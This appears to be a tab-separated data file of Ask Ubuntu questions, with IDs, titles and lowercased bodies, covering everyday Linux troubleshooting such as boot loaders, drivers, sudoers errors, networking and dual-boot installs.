/ w ' , with w ' = ( gx + hy + i ) . typically , a and e corresponds to the scaling on the x and y axes , c and f corresponds to the translation on those axes , and g , h , and i are respectively 0 , 0 and 1 . the matrix can also be used to express more complex transformations such as keystone correction , or rota‐ tion . for a rotation of an angle t , this formula can be used : cos t -sin t 0 sin t cos t 0 0 0 1 as a special argument , instead of passing a matrix , one can pass the string none , in which case the default values are used ( a unit matrix without filter ) . n.b . i have asked this previously at unix & linux stackexchange , but received no answer . i 'll remove the dupe if i get an answer at either site .
438034	windows xp vm or windows 7 vm ?	i 've got an hp laptop with 750 gb rom,4 gb ram , a dual-core processor with 2.4 ghz and it 's running ubuntu 12.04 . i want to use virtualbox to make a windows xp/7 virtual machine , but i do n't know which one of them is better for gaming . i think windows xp sp3 ( 64-bit ) would run almost any game perfectly with 3512 or 3252 mb of ram allocated to it , because i do n't really care about how my vm looks , i want top performances . windows 7 is very good too , but it consumes more resources so ... what do you think ? what should i choose ?
438036	ca n't get past the splash then comp shuts down	i start the installation from grub and everything seems to work until the dots stop changing color and my computer eventually seems to shut down . i 've tried pressing the down arrow during the installation and i can see the error . it says `` usb 1-7 : unable to read config index 0 descriptor/start : -71 '' and so on . i 'm not sure what 's wrong .
438037	vagrant fails to load because grub2 waits for kernel selection after ungraceful shutdown	i have a vagrant box with ubuntu 12.04 lts . sometimes after forcing a shutdown ( e.g . because the machine became unresponsive ) the vagrant box fails to boot the next time . $ vagrant up bringing machine 'default ' up with 'virtualbox ' provider ... [ default ] clearing any previously set forwarded ports ... [ default ] creating shared folders metadata ... [ default ] clearing any previously set network interfaces ... [ default ] preparing network interfaces based on configuration ... [ default ] forwarding ports ... [ default ] -- 22 = > 2222 ( adapter 1 ) [ default ] running 'pre-boot ' vm customizations ... [ default ] booting vm ... [ default ] waiting for machine to boot . this may take a few minutes ... the preview screenshot in virtualbox suggests that the box hangs at the grub stage , forever waiting for a user input to select the kernel . so every time this occurs , i set vb.gui = true in the vagrantfile , restart the machine and select the kernel to boot manually . the interesting thing is that after selecting the kernel once , subsequent headless starts again just work fine - until the next ungraceful machine shutdown . my questions is : is there a more elegant way that does not require manual intervention to prevent that the vagrant box hangs at the grub kernel selection screen after a forced shutdown ?
438041	display only the data section of the packet	i am trying to display only the data section of an udp packet using tcpdump . in some other words , is it any way to filter the header section of the udp package ? the below command sudo tcpdump -aq -i lo udp port 1234 returns : e.. '' .j @ . @ .u~ ... ... ... v ... .. ! hello how can i discard the e.. '' .j @ . @ .u~ ... ... ... v ... .. ! part ?
438042	ubuntu on an external hd windows 7 and 8 machines	i have just installed ubuntu 13.10 onto an external hard drive using my windows 7 hp laptop . when i installed it on the hd i put the bootloader onto the hd itself , however when i plug the external hd into my windows 8 lenovo laptop , booting to it simply present a blank screen for a while and then the computer resumes to boot windows 8 . are the two os 's possibly getting in the way of booting on the hd ? i am unsure and hope to find an answer as i would like a portable os with all of my files that could be plugged into any computer and boot .
438044	ubuntu and apache2 cache are getting me crazy ?	i 'm trying to debug a website hosted on a virtual machine . for some reason i have created new images replacing the existing one . when refreshing the page , browser shows the old asset regardless any expiration header , cache revalidation etc . if i name the image differently , everything is fine . if i delete the original image , refresh the page to purge the local browser cache and then save the image with the old name , i get the browser to show the content of the image that has been deleted . i suspect there is a problem with a potential apache and ubuntu cache system , but i do n't know from where i have to start looking at . any help it would be appreciated .
438052	netbook screen resolution locked after changin kernel	i 'm new with ubuntu , so i might not understand technical expressions . i have a netbook asus eee pc x101ch with 10.1 '' led backlight wsvga ( 1024x600 ) screen . i use ubuntu 12.04 , i changed the kernel to 3.13.15 i386 and after i restarted the screen resolution changed to 800 x 600 and i can not change it back ! xrandr : failed to get size of gamma for output default screen 0 : minimum 800 x 600 , current 800 x 600 , maximum 800 x 600 default connected primary 800x600+0+0 0mm x 0mm 800x600 61.0* 1024x600_60.00 ( 0x1a7 ) 49.0mhz h : width 1024 start 1072 end 1168 total 1312 skew 0 clock 37.3khz v : height 600 start 603 end 613 total 624 clock 59.9hz what can i do ? thank you !
438053	xubuntu 13.10 - openshot - create project by media date order	i have a directory of images and videos , i simply want to import them into openshot and make a video slideshow in order that each was taken . can openshot do this via the metadata within each file ? thanks
438056	usb 2.0 1 to 4 port splitter not working	this is the output of lsusb -v on ubuntu 12.04 bus 001 device 003 : id 0408:2fb1 quanta computer , inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 239 miscellaneous device bdevicesubclass 2 ? bdeviceprotocol 1 interface association bmaxpacketsize0 64 idvendor 0x0408 quanta computer , inc. idproduct 0x2fb1 bcddevice 9.01 imanufacturer 3 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 1457 bnuminterfaces 3 bconfigurationvalue 1 iconfiguration 2 bmattributes 0x80 ( bus powered ) maxpower 250ma ** unrecognized : 24 ff 42 49 53 54 00 01 05 02 10 00 00 00 00 00 01 05 d0 07 02 06 d0 07 03 07 d0 07 04 08 d0 07 05 09 d0 07 lsusb -v : http : //pastebin.ubuntu.com/7218456/ lspci -v : http : //pastebin.ubuntu.com/7218460/
438057	ubuntu waits for keypress with purple screen	i have a hp probook 4515s with 13.10 on it . when i boot it , it always hangs on the purple screen , before the ubuntu logo appears . it is not stuck , but it waits until i press any key ( i do mean any ) . then the boot process resumes normally . i have never seen this before . i have checked dmesg , syslog , kern.log and so on , but i ca n't find any traces of a prompt during boot saying `` press any key '' or anything like that . i would like to fix it because the laptop is for my mother in law , an older woman . i 'd like it to work without any fuzz . /etc/default/grub looks like this : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' ''
438063	vlc wo n't download	i 'm new to ubuntu and i 'm using version 13.10 . i tried to install vlc , but every time i click the download icon it tells me that i need an application to open this link , then invites me to choose one from an empty list .
438064	closing sudo password	i cant download not a thing on ubuntu download center.i dont know my root password . its always wants sudo password.and i cant write it ( 覺 dont even know it though ) how can 覺 close or inactive it ?
438065	kernel execution with rfs from nfs	while working on redboot , , after loading kernel into memory , i 'm trying to execute it with rfs from nfs as follows : exec -c `` console=ttyam0,115200 ip=192.168.0.50:192.168.0.1:192.168.0.1 nfsroot=192.168.0.1 : /home/mbassem/nfs '' and i got that error : portmap : server 192.168.0.1 not responding , timed out root-nfs : unable to get nfsd port number from server , using default looking up port of rpc 100005/1 on 192.168.0.1 portmap : server 192.168.0.1 not responding , timed out root-nfs : unable to get mountd port number from server , using default mount : server 192.168.0.1 not responding , timed out root-nfs : server returned error -5 while mounting /home/mbassem/nfs vfs : unable to mount root fs via nfs , trying floppy . vfs : can not open root device `` '' or 02:00 please append a correct `` root= '' boot option kernel panic : vfs : unable to mount root fs on 02:00
438070	what unix codes do i need to extend my ubuntu partition	i am running ubuntu 13.10 through vmware player from win.7 . i want to extend ubuntu partition by adding to it the unallocated 11gb space next to it . gparted from livecd does not work , because it does not see the ubuntu partition in ntfs . it seems i have to do this on a terminal from within my ubuntu with fdisk , etc . extending partitions is a simple task in windows ; i have no idea how to do this in ubuntu . here is my gparted hard disk picture : /dev/sda1 ext4 / 23.50 gb 19.50 gb 4.00 gb lvm unallocated unallocated 11.50 gb
438071	home folder disappearing in fraction of seconds , unable to access the home folder	home folder disappearing in fraction of seconds , unable to access the home folder . os is ubuntu 13.10 . please help me to get this issue resolved . thanks
438074	throwing error message when opening terminal	i 'm new on ubuntu and ros . i installed two different distro . ( groovy and hydro ) . when i open the terminal i take this error . bash : /opt/ros/groovy/setup.bash : no such file or directory i remove ros . i search on internet , type gedit ~/bashrc to delete /opt/ros/hydro/setup.bash in it . but this file is empty in my case . how can i get rid of this error ?
438075	wired connection is disabled after setting ipv6	i am installing openstack in my ubuntu-12.04-x-64-bit which is on host os that is windows 8 . i am following tutorial from stackgeek.com but when i change /etc/network/interfaces file to # loopback auto lo iface lo inet loopback # primary interface auto eth0 iface eth0 inet static address 10.0.1.100 netmask 255.255.255.0 gateway 10.0.1.1 dns-nameservers 8.8.8.8 # ipv6 configuration iface eth0 inet6 auto the wired-connection is disconnected . any solution ? ? ? this does n't work too . # the loopback network interface auto lo iface lo inet loopback # primary interface auto eth0 iface eth0 inet dhcp # ipv6 configuration iface eth0 inet6 auto
438079	error : sudo : /etc/sudoers is mode 0777 , should be 0440	sudo : /etc/sudoers is mode 0777 , should be 0440 sudo : no valid sudoers source found , quitting sudo : unable to initialize policy plugin i have ubuntu server 12.04.4 lts and this sudo problem , i cant use sudo command , please help everyone , how to fix this sudo error . please help !
438085	ubuntu 13.10 as a bluetooth audio sink for a2dp supported tv	i have a panasonic th-l50dt60 which supports a2dp audio streaming over bluetooth . i have a netbook running ubuntu . i edited my /etc/bluetooth/audio.conf by uncommenting these : enable=source scorouting=pcm autoconnect=true i tested whether my laptop receives audio by connecting a nexus phone . i played a song on the phone and there was audio output from laptop speakers . after this , i did a bluetooth scan on the tv to see if it detects my laptop as an audio sink . but it failed to show any devises . but my laptop bluetooth stack sees the tv as a a2dp audio source . as tv is the audio source and it should detect my laptop as an audio sink and it is not happening . i have many bluetooth devises and tv detects none . so , how can i get my tv to detect my laptop as an a2dp audio sink ?
438088	how to fix disk that is likely to fail soon ?	can i repair my hard disk ? i am a beginner with ubuntu and i do n't know how i can fix my hard drive or if it can be repaired .
438091	another 13.10 wireless issue	i 'm aware there are quite a few threads out there discussing wireless connectivity issues , and i can assure you i 've read them . but i 'm still having problems after following through all of those . my problem is this . my wifi is slow to the point of not working , and drops connection every few minutes . what 's more strange than that is that , when i speedtest , i get these weird spikes in speed , up and down , up and down . wifi spikes i 've tried the things listed here , here , and here . none of these have resolved the issue . i 'm aware you guys are going to need wireless card info and stuff , but i 'm not sure the exact commands to run/stuff to give you , so please let me know that and i 'll update the question with any pertinent info . thanks for your time , this has been driving me nuts for days now . i should mention that the connection is fine when i 'm : using wired connection , using windows , using another computer in the house . however , the problem persists at my university as well , so i 'm pretty sure it is n't just my router . output of lshw -c network : *-network description : ethernet interface product : ar8151 v2.0 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c0 serial : dc:0e : a1 : b8:21:13 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:54 memory : f0300000-f033ffff ioport:3000 ( size=128 )
438093	unable to browse internet ssl error	i have ubuntu 13.10 installed . i have chrome and firefox installed , but today i 'm getting message ssl error in chrome : unable to connect to any web pages . in firefox there is also some these type of error echoed but it hardly opens a few web pages . please help me .
438095	apwr3_1 and pax error while login to ubuntu	could anyone please give me some suggestions on how to resolve this error ? or is there any way to reinstall ubuntu while still keep my data ? error : apwr3_1 failed to load , you may need to build apwr3_1 driver for your kernel error : pax failed to load , you may need to build pax driver for your kernel after my ubuntu boots and i type username and password to login into graphic mode , it outputs such error info . now the only thing i can enter is command line mode , which is ctrlaltf1 . i searched askubuntu and google , but i have not found useful info . i would appreciate a lot any reply !
438096	ca n't reset title bar right-click behavior in unity , ubuntu 12.10	i recently upgraded from ubuntu 12.04 to 12.10 . in 12.04 , a title bar right-click would cause the menu to popup . after my upgrade right-click shades/unshades the window . i want the previous behavior , so i opened /apps/metacity/general in gconf settings , and saw that 'action_right_click_title_bar ' was set to toggle-shade . i switched the value to 'menu ' , logged out , then logged back in . however , the behavior did not change . i verified that 'action_right_click_title_bar ' was still 'menu ' ( it was ) . i also tried unsetting the key with no results . how do i change the behavior to show the menu when the window title-bar is right-clicked ?
438101	open vmx file in vmware	i have ubuntu-12.4 installed on vmware and i want to edit .vmx file to enable kvm virtualization i have seen a tutorial how to edit but ca n't find where the .vmx file is ?
438102	should i install the debian or xubuntu version of texstudio on 12.04 ?	i 'd like to install the newest 64-bit version of texstudio on ubuntu 12.04 . since it 's not in one of the default repositories , i need to get it a different way . the texstudio homepage has links for debian 6.0 and 7.0 , as well as links for xubuntu 12.04 . this answer suggests downloading the xubuntu version but does n't compare it to any other versions or explain why . which one should i choose , and why ? or is this something that i should ask the developers of the program ?
438104	tri boot on an imac	i have a 2013 imac ( desktop ) which is running os x mavericks , windows 8 and ubuntu raring . i am using refind to do the initial boot up but there are a few problems with this setup : it takes a long time ( maybe 30 seconds ) for refind to start up ( i understand that this is the fault of some apple scanning , and not refind ) . refind is unable to launch windows ( it hangs with the windows logo ) . i must hold alt on startup to select booting off that drive . ubuntu 's grub lists all the oses again , which annoys me ... especially since it is unable to launch either os x or windows if they are selected . which basically feels like i have 3 layers of booters , and if i want to boot into an os i need to remember which layer to use . the ideal setup would be to just hold the alt key on startup , which would give me a choice of os to startup . it 's not as pretty as refind , but it would be conceptually simpler and ( hopefully ) avoid the startup wait . but ubuntu 's grub is not in the list : it only has os x , os x recovery , windows and any external drives i have connected . how do i add grub to the mac boot list , and how do i make it the default ? and how can i name the options ? i 'm actually quad booting with debian and i 'd need a way to distinguish linux flavours .
438109	apport-collect < bug_no > returning `` no route to host ''	i just filed a bug on launchpad , for which i have been asked to submit the output of : apport-collect 1296270 however , when i run this command , i get the following output : error : connecting to launchpad failed : [ errno 113 ] no route to host you can reset the credentials by removing the file `` /home/jobin/.cache/apport/launchpad.credentials '' however , i have checked that my internet connection is working fine . it may be noted that i am behind a proxy server that requires authentication to access internet and have set the proxy settings in /etc/environment and in my ~/.bashrc file . i have verified that the settings are reflecting on the terminal using echo $ http_proxy and echo $ https_proxy . i can also successfully use traceroute google.com in 17 ms. how do i solve this , to successfully run apport-collect < bug_no > ? is it a bug or is there a wordaround ? p.s . : i could confirm that i can run apport-collect < bug_no > and submit the results to launchpad on a system not behind manual proxy .
438110	downloading music & photos from windows 7 ultimate 64 bit to ubuntu 13.10	i am a complete novice and intend remove windows 7 ultimate 64bit from my pc and complete clean install ubuntu 13.10 . i have backed up my files to my d drive ( documents , music and photos ) is it just a job of sending them to ubuntu or is it more difficult than that . i should explain that i am not technical and do not understand the workings of software , i also must apologize for my ignorance on the workings of your software as i am only used to windows
438112	is there windows bluray player software that runs on wine in ubuntu 13.10	i 'm looking for bluray player software that i can run through wine in ubuntu 13.10 . i do n't mind paid software . the reason i 'm looking for wine and not native is that , as far as i can tell , there are no native blueray players that can play the newest bluray disks . thanks ! edit 1 : i 'm not interested in ripping bluray , just playing them . yes , i know if you can read it you can rip it , but i just want to clear on my end goal . edit 2 : i 've gotten some blurays to work through makemkv ( e.g . monsters university ) , but newer disks like the hobbit ( extended edition ) are not viewable .
438118	automoumting usb upon connection	how can i set a configuration in ubuntu , so that any usb flash memory is mounted automatically after connection ? i know how to configure nautilus to automount a flash disk , but i need more : immediate automatic mounting upon connection ( so that some hidden always-running scripts can access it when it is connected ) .
438119	ubuntu 14.04 move window buttons to right	hey guys i just installed ubuntu 14.04 , and i have tried to move the buttons from left to right by using unity tweak tool without success . can somebody help me to move the buttons please ? thanks for your help .
438122	what is the /etc/init/failsafe.conf file for ?	what exactly is the /etc/init/failsafe.conf for ? i have disabled the sleep timers in my failsafe.conf file which get make a faster boot up time . are there any downsides ? the only things i could come up with looking around was a this description from this link which complains that the wait time is n't high enough . i think that [ 30 ] is really to small a number . you 're only safeguarding against the case where a user had an entry in /etc/network/interfaces that where the device was removed or is not connected . thats a very rare case . increasing the timeout to 60 seconds would make it less likely to have a false positive and have rc-sysinit start early . ( ie , the case where a dhcp took 35 seconds ) . inside of the failsafe.conf file itself states # the point here is to wait for 2 minutes before forcibly booting # the system . anything that is in an `` or '' condition with 'started # failsafe ' in rc-sysinit deserves consideration for mentioning in # these messages . currently only static-network-up counts for that . i do n't believe rc-sysinit depends on the network . what purposes does /etc/init/failsafe.conf serve ?
438123	accidentally deleted /etc/sudoers file	i get the following error while trying to update my repositories , avinash @ avinash-virtualbox : ~ $ sudo apt-get update sudo : unable to stat /etc/sudoers : no such file or directory sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin it seems like i had accidentally deleted my /etc/sudoers file./etc/sudoers file was actually belongs to sudo package , so i try to reinstall sudo by pkexec but it wo n't work . avinash @ avinash-virtualbox : ~ $ pkexec apt-get install sudo reading package lists ... done building dependency tree reading state information ... done sudo is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 301 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up sudo ( 1.8.6p3-0ubuntu3.1 ) ... warning : /etc/sudoers not present ! chown : can not access â/etc/sudoersâ : no such file or directory dpkg : error processing sudo ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : sudo e : sub-process /usr/bin/dpkg returned an error code ( 1 ) avinash @ avinash-virtualbox : ~ $ and also i had tried , avinash @ avinash-virtualbox : ~ $ pkexec apt-get install -- reinstall sudo reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 301 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . e : internal error , no file name for sudo : amd64 how can i make sudo command to work again ?
438125	installing 64bit 12.04 lts along with 32bit window 7	i am facing issues with installing ubuntu 12.04 lts ( 64 bits ) alongside windows 7 ( 32 bits ) . my machine is intel i5 . my current windows partitions are : c : drive of 50 gb d : drive of 195 gb e : drive of 221 gb system reserved of 100 mb . i tried to usb boot and install ubuntu , during the installing process i could see 3 options : a ) install inside windows 7 b ) erase c ) something else . i choose `` something else '' and when proceeded , i could't find all my windows partitions . given below is my fdisk -l report : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3e025634 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 102402047 51097600 42 sfs /dev/sda4 102402048 976771119 437184536 42 sfs disk /dev/sdb : 32.0 gb , 32015679488 bytes 255 heads , 63 sectors/track , 3892 cylinders , total 62530624 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4da96a7f device boot start end blocks id system /dev/sdb1 * 32 62530623 31265296 c w95 fat32 ( lba ) listing below is my parted -l command report . model : ata hitachi hts54505 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 1049kb 1016kb primary ext2 2 1049kb 106mb 105mb primary ntfs boot 3 106mb 52.4gb 52.3gb primary ntfs 4 52.4gb 500gb 448gb primary ntfs model : sandisk cruzer force ( scsi ) disk /dev/sdb : 32.0gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 16.4kb 32.0gb 32.0gb primary fat32 boot , lba i also tried to execute the command `` sudo dmraid -e -r /dev/sda '' . for which i got error message like `` no raid disks and with names : `` /dev/sda '' . how should i proceed ?
438126	grub rescue ; `` no such device '' error happens intermittently	i have three storage devices : ⠀/dev/sda/ , an ssd with windows 8 installed on it ( ntfs ) ⠀/dev/sdb/ , an hdd with a single ntfs partition on it that is shared ⠀/dev/sdc/ , an ssd with ubuntu 13.10 installed on it as a single ext4 partition about 50 % of the time when i reboot , usually to switch the os , i see the following : error : no such device : < uuid > entering rescue mode ... grub rescue > where < uuid > is the uuid of /dev/sdc1 . when it happens , it goes away if i press ctrl+alt+del and go into my bios 's boot menu and choose /dev/sda to boot from . the intermittent behavior and the fact that it goes away only through that method ( i.e . reinstalling grub to /dev/sda as other ask ubuntu answers recommend does not help ) makes me think this is unrelated to the dozens of other au questions about the same error message . what can i do to resolve this ?
438128	error installing keystone openstack	i 'm trying to install openstack in ubuntu 12.04 which is hosted on windows 8 via vmware workstation 10.0 but i 'm getting error while installing keystone . i have pasted all output in pastebin here
438131	how to turn on the lcd screen on my laptop after installing fglrx driver	on my computer asus n71ja i installed ubuntu 12.04 and after installing fglrx driver computer starts but soon turns off the screen . ( login screen is not displayed , but you can hear the sound ) i have connected the pc to the tv ( via vga cable ) and the tv picture is ok ( 3d acceleration works , glxgears works , opengl is ok ) .i tried to use the radeon driver but 3d does not work ( eg glxgears ) how do i turn the screen on a laptop or modify xorg.conf ?
438132	nautilus opens a new window	every time i mount any external hard drive or other partitions and open it in nautilus , clicking on the nautilus icon again opens a new window . can i stop this from happening ? if not , is there any workaround for this because its kinda annoying . also , there is no way to switch back to the old window apart from doing alt+tab .
438134	ubuntu 12.04 + amd-ati will not work with google-earth	ubuntu-ers , just starting with ubuntu , i 've a problem with google-earth ( i believe most folks have.. ) . hopefully someone will help . i 've now the proprietary amd ati drivers for amd / ati caicos radeon hd 6450 card . the standard drivers ubuntu gave me the problem in the first place . the problem : when starting google earth , i get 2 screens that stay white . ( one is the main ge and the other the start-tips-screen . ) i can move them around , mini-and maximize them . but that is it . the only way to get rid of them is xkill them . which nevertheless give me a problem when closing everything saying that the system is still busy finding a ge-bin file . have to force the closing . i feel it has to be just a kind of setting or other small item . i just ca n't work it out . also , i 've tried some sugestions from different sites , re-installing in different ways and so on . all my system-info tells me , it should work . it just does not . below i give you the data that i believe might be of relevance . hope i 'm not doing it to long / much this first time . if so , so sorry . had to translate it a bit . details overall : ubuntu 12.04 lts memory 2,0 gib procesor intel @ pentium ( r ) d cpu 2.80ghz x 2 details-graphic : vesa : caicos envirement standard type best syst : 32 bit disk : 29,3 gb fglrxinfo : display : :1 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6450 opengl version string : 4.3.12618 compatibility profile context 13.251 fglrxinfo_gears : fglrxinfo_gears : command not found $ fgl_glxgears using glx_sgix_pbuffer 1071 frames in 5.0 seconds = 214.200 fps 1319 frames in 5.0 seconds = 263.800 fps lspci | grep display gives no result apt-get install -- reinstall lsb-core says everyting is already there and is new . /usr/lib/nux/unity_support_test -p : opengl vendor string : ati technologies inc. opengl renderer string : amd radeon hd 6450 opengl version string : 4.3.12618 compatibility profile context 13.251 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes sudo apt-get install linux-headers-generic also say everything is already there and is new . nothing has been changed . sudo apt-get install dkms also say everything is already there and is new . nothing has been changed my info typed from catalyst control center : memory -type ddr3 -klock 667mhz -size 2048 gbytes bus graphic posibillities pci express 2.0 maximum adust x 16 software version driver-package 13.251-131206a-167201c-ati version 2d-driver 13.25.5 ( *i thought this might be it , but now i believe more that it is about google earth itself . * ) version catalyst control center 2.20 randr-versie 1.3 opengl provider opengl advanced md inc renderer opengl amd hd 6450 opengl-versie 4.3.12618 compatibillity profile context 13.251 lspci : 00:00.0 host bridge : via technologies , inc. p4m890 host bridge 00:00.1 host bridge : via technologies , inc. p4m890 host bridge 00:00.2 host bridge : via technologies , inc. p4m890 host bridge 00:00.3 host bridge : via technologies , inc. p4m890 host bridge 00:00.4 host bridge : via technologies , inc. p4m890 host bridge 00:00.5 pic : via technologies , inc. p4m890 i/o apic interrupt controller 00:00.6 host bridge : via technologies , inc. p4m890 security device 00:00.7 host bridge : via technologies , inc. p4m890 host bridge 00:01.0 pci bridge : via technologies , inc. vt8237/vx700 pci bridge 00:02.0 pci bridge : via technologies , inc. p4m890 pci to pci bridge controller 00:03.0 pci bridge : via technologies , inc. p4m890 pci to pci bridge controller 00:0f.0 ide interface : via technologies , inc. vt8237a sata 2-port controller ( rev 80 ) 00:0f.1 ide interface : via technologies , inc. vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide ( rev 07 ) 00:10.0 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) 00:10.1 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) 00:10.2 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) 00:10.3 usb controller : via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev a0 ) 00:10.4 usb controller : via technologies , inc. usb 2.0 ( rev 86 ) 00:11.0 isa bridge : via technologies , inc. vt8237a pci to isa bridge 00:11.7 host bridge : via technologies , inc. vt8237/8251 ultra vlink controller 00:12.0 ethernet controller : via technologies , inc. vt6102 [ rhine-ii ] ( rev 7c ) 00:13.0 pci bridge : via technologies , inc. vt8237a host bridge 00:13.1 pci bridge : via technologies , inc. vt8237a pci to pci bridge 02:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] caicos [ radeon hd 6450/7450/8450 ] 02:00.1 audio device : advanced micro devices , inc. [ amd/ati ] caicos hdmi audio [ radeon hd 6400 series ] 03:00.0 sata controller : jmicron technology corp. jmb363 sata/ide controller ( rev 02 ) 03:00.1 ide interface : jmicron technology corp. jmb363 sata/ide controller ( rev 02 ) 04:01.0 audio device : via technologies , inc. vt8237a/vt8251 hda controller ( rev 10 ) 05:03.0 firewire ( ieee 1394 ) : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller ( rev 46 ) 05:04.0 multimedia controller : philips semiconductors saa7131/saa7133/saa7135 video broadcast decoder ( rev d1 )
438135	netrunner and windows 8 dualbooted replace netrunner with ubuntu while keeping windows 8 ?	so i have netrunner and windows 8 ( i have a normal bios no new windows 8 bios stuff , used to be a windows 7 machine ) and i wan na replace netrunner with ubuntu 13.10 . i have grub installed so no wubi here , do i need to do something special or will the installer just go like hey you have 2 oses wan na replace one with ubuntu and keep the other ? if not what do i do ? i do n't wan na screw up everything because i have important stuff on this computer !
438136	two wlan connections at once	is it possible to connect with two wlan access points or ad hoc networks at once ? in best case , using network manager . or is this permitted by hardware design ? i like to have another connection to another local service with less latency than my wlan/wan router offers .
438137	startx fails to start	i ran the software manager and now startx does n't start anymore . after i start my laptop and log in , the screen stays stuck on the login page ( i tried with both gdm and lightdm ) . switching to console and starting startx manually i get the following errors : mktemp : failed to create file via template ‘/tmp/serverauth.xxxxxxxxxx’ : permission denied xauth : file does not exist xauth : unable to link authority file , use -n use : x [ : < display > ] [ option ] -a # default pointer acceleration ( factor ) -ac disable access control restrictions -audit int set audit trail level -auth file select authorization file ... initializing built-in extension dri2 loading extension glx the xkeyboard keymap compiler ( xkbcomp ) reports : > error : can not open `` /tmp/filegrxhgh '' to write keyboard description > exiting the xkeyboard keymap compiler ( xkbcomp ) reports : > error : can not open `` /tmp/fileb9lgzg '' to write keyboard description > exiting xkb : failed to compile keymap keyboard initialization failed . this could be a missing or incorrect setup of xkeyboard-config . ( ee ) fatal server error : ( ee ) failed to activate core devices . ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . ( ee ) please also check the log file at `` /var/log/xorg.1.log '' for additional information . ( ee ) ( ii ) aiglx : suspending aiglx clients for vt switch ( ee ) server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : connection refused xinit : unexpected signal 2 i found reference to multiple similar problems and have tried various things . making sure i have enough space disk : here 's a df output , it does n't seem to be the problem . root @ blackbox : ~ # df -h filesystem size used avail use % mounted on /dev/sda6 22g 18g 2.9g 87 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 376m 1.2m 374m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 4.0k 1.9g 1 % /run/shm none 100m 4.0k 100m 1 % /run/user the permission of my .xauthority file are wrong at startup : root @ blackbox : ~ # ls /home/florian/.xauthority -al -rw -- -- -- - 1 root root 155 mar 23 17:10 /home/florian/.xauthority however if i chown the file and reboot i still have the same problem . i have uninstalled ( with purge ) and reinstalled xserver-xorg and ran dpkg-reconfigure xserver-xorg but no luck . update if i stop the display manager before retrying to start startx i get the following errors : xauth : timeout in locking authority file /home/florian/.xauthority ... loading extension glx the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to the x server the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to the x server the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : compat map for group 2 redefined > using new definition > warning : compat map for group 3 redefined > using new definition > warning : compat map for group 4 redefined > using new definition errors from xkbcomp are not fatal to the x server the xkeyboard keymap compiler ( xkbcomp ) reports : > warning : type `` one_level '' has 1 levels , but < ralt > has 2 symbols > ignoring extra symbols errors from xkbcomp are not fatal to the x server ( ii ) aiglx : suspending aiglx clients for vt switch xinit : connection to x server lost ^m waiting for x server to shut down ( ee ) server terminated successfully ( 0 ) . closing log file . xinit : unexpected signal 2 xauth : timeout in locking authority file /home/florian/.xauthority the only solution i found is to run startx as root , then it works but i should n't need to do that ! update 2 the best solution i found so far is to switch to virtual terminal , remove the .xauthority file then run ´startx´ . but i need to do this every time i boot .
438144	install ubuntu in dualboot with windows 7	i ca n't install ubuntu using an external dvd writer/reader , when i 'm selecting `` install ubuntu inside windows '' the screen goes black and dvd is ejected from dvd tray , then if i press anything my pc is rebooting . i see something like : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate ... [ ok ] then the dvd is ejected from the bay . what 's wrong ?
